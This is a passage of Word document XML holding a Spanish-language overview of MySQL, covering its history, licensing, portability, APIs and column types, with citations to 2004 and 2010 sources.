    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="006A727E">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5326FD77" wp14:editId="19D68DCF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2094230</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>477165</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1400175" cy="952500"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1080" name="Imagen 1080" descr="Resultado de imagen para mySQ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mySQL log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00175"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7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="006A727E">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="006A727E">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006A727E" w:rsidRPr="00F7769F" w:rsidRDefault="006A727E" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="006A727E">
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:t>Es un sistema de gestor de base de datos relacionales, que además ofrece compatibilidad con php, Perl, C y HTMLM, y funciones avanzadas de administración y optimización de bases de datos para facilitar las tareas habituales.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="006A727E">
      <w:r w:rsidRPr="00F7769F">
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">MySQL es un sistema cliente-servidor de administración de bases de datos relacionales diseñado para el trabajo tanto en los sistemas operativos Windows, Unix/Linux. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:id w:val="724955749"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00D168BF" w:rsidRPr="00F40EE5">
            <w:rPr>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00D168BF" w:rsidRPr="00F40EE5">
            <w:rPr>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Pér04 \l 2058 </w:instrText>
          </w:r>
          <w:r w:rsidR="00D168BF" w:rsidRPr="00F40EE5">
            <w:rPr>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE" w:rsidRPr="009E53AE">
            <w:rPr>
              <w:noProof/>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:t>(César, 2004)</w:t>
          </w:r>
          <w:r w:rsidR="00D168BF" w:rsidRPr="00F40EE5">
            <w:rPr>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="006A727E" w:rsidRDefault="00F7769F" w:rsidP="006A727E">
      <w:r w:rsidRPr="00F7769F">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="006A727E" w:rsidP="006A727E">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F7769F" w:rsidRPr="00F7769F">
        <w:t>MySQL es, por otro lado, la base de datos elegida por la gran mayoría de programadores en PHP, Soporta el lenguaje SQL y la conexión de varios usuarios, pero, en general, se utiliza para aplicaciones de tamaño pequeño-medio.</w:t>
      </w:r>
      <w:r w:rsidR="00D168BF" w:rsidRPr="00D168BF">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:id w:val="1691022544"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00D168BF" w:rsidRPr="00F40EE5">
            <w:rPr>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00D168BF" w:rsidRPr="00F40EE5">
            <w:rPr>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Pue04 \l 2058 </w:instrText>
          </w:r>
          <w:r w:rsidR="00D168BF" w:rsidRPr="00F40EE5">
            <w:rPr>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE" w:rsidRPr="009E53AE">
            <w:rPr>
              <w:noProof/>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:t>(Puertas, 2004)</w:t>
          </w:r>
          <w:r w:rsidR="00D168BF" w:rsidRPr="00F40EE5">
            <w:rPr>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="006A727E" w:rsidRDefault="006A727E" w:rsidP="006A727E"/>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="006A727E" w:rsidP="006A727E">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F7769F" w:rsidRPr="00F7769F">
        <w:t>MySQL es un sistema de gestión de bases de datos relacional desarrollado bajo licencia dual GPL/Licencia comercial por Oracle Corporation y está considerada como la base datos open source más popular del mundo, y una de las más populares en general junto a Oracle y Microsoft SQL Server, sobre todo para entornos de desarrollo web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A727E" w:rsidRDefault="006A727E" w:rsidP="006A727E"/>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="006A727E" w:rsidP="006A727E">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F7769F" w:rsidRPr="00F7769F">
        <w:t>MySQL fue inicialmente desarrollado por MySQL AB (empresa fundada por David Axmark, Allan Larsson y Michael Widenius). MySQL A.B. fue adquirida por Sun Microsystems en 2008, y ésta a su vez fue comprada por Oracle Corporation en 2010, la cual ya era dueña desde 2005 de Innobase Oy, empresa finlandesa desarrolladora del motor InnoDB para MySQL.</w:t>
      </w:r>
      <w:r w:rsidR="00D168BF" w:rsidRPr="00D168BF">
        <w:rPr>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1940753006"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00D168BF" w:rsidRPr="00D168BF">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00D168BF" w:rsidRPr="00D168BF">
            <w:instrText xml:space="preserve"> CITATION Tut10 \l 2058 </w:instrText>
          </w:r>
          <w:r w:rsidR="00D168BF" w:rsidRPr="00D168BF">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Tutorialspoint.com, 2010)</w:t>
          </w:r>
          <w:r w:rsidR="00D168BF" w:rsidRPr="00D168BF">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00A02AB4">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Características</w:t>
      </w:r>
      <w:r w:rsidR="00A02AB4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A02AB4" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Al contrario de proyectos como el apache, donde el software es desarrollado por una comunidad publica, y el copyright del código está en poder del auto individual, MySQL es propiedad y está patrocinado por una empresa privada, que posee el copyright de la mayor parte del código.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0082495F" w:rsidRPr="0082495F" w:rsidRDefault="0082495F" w:rsidP="0082495F">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="0082495F">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Inferiores y Portabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Esta desarrollado en su mayor parte en ANSI C.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Probado con un amplio rango de compiladores diferentes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Funciona en diferentes plataformas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>APIs disponibles para C, C++, Eiffel, Java, Perl, PHP, Python, Ruby, y Tcl.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Usa GNU Automake, autoconf, y Libtool para portabilidad.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Proporciona sistemas de </w:t>
      </w:r>
      <w:r w:rsidR="0082495F" w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>almacenamientos transaccionales y no transaccionales</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="150"/>
        <w:ind w:right="60"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Relativamente sencillo de añadir otro sistema de almacenamiento. Esto es útil si desea añadir una interfaz SQL para una base de datos propia.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="150"/>
        <w:ind w:right="60"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Un sistema de reserva de memoria muy rápido basado en threads.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="150"/>
        <w:ind w:right="60"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Joins muy rápidos usando un multi-join de un paso optimizado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="150"/>
        <w:ind w:right="60"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tablas hash en memoria, que son usadas como tablas temporales.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="150"/>
        <w:ind w:right="60"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Las funciones SQL están implementadas usando una librería altamente optimizada y deben ser tan rápidas como sea posible. Normalmente no hay reserva de memoria tras toda la inicialización para consultas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="150"/>
        <w:ind w:right="60"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El código </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00A02AB4">
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri"/>
            <w:color w:val="00000A"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>MySQL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> se prueba con Purify (un detector de memoria perdida comercial) así como con Valgrind, una herramienta GPL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0082495F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="150"/>
        <w:ind w:right="60"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El servidor está disponible como un programa separado para usar en un entorno de red cliente/servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0082495F" w:rsidRPr="00F7769F" w:rsidRDefault="0082495F" w:rsidP="0082495F">
      <w:pPr>
        <w:spacing w:after="150"/>
        <w:ind w:left="720" w:right="60"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="0082495F">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Tipos de columnas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Diversos tipos de columnas: enteros con/sin signo de 1, 2, 3, 4, y 8 bytes de longitud, </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>FLOAT</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DOUBLE</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CHAR</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>VARCHAR</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>TEXT</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>BLOB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0082495F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>TIME</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
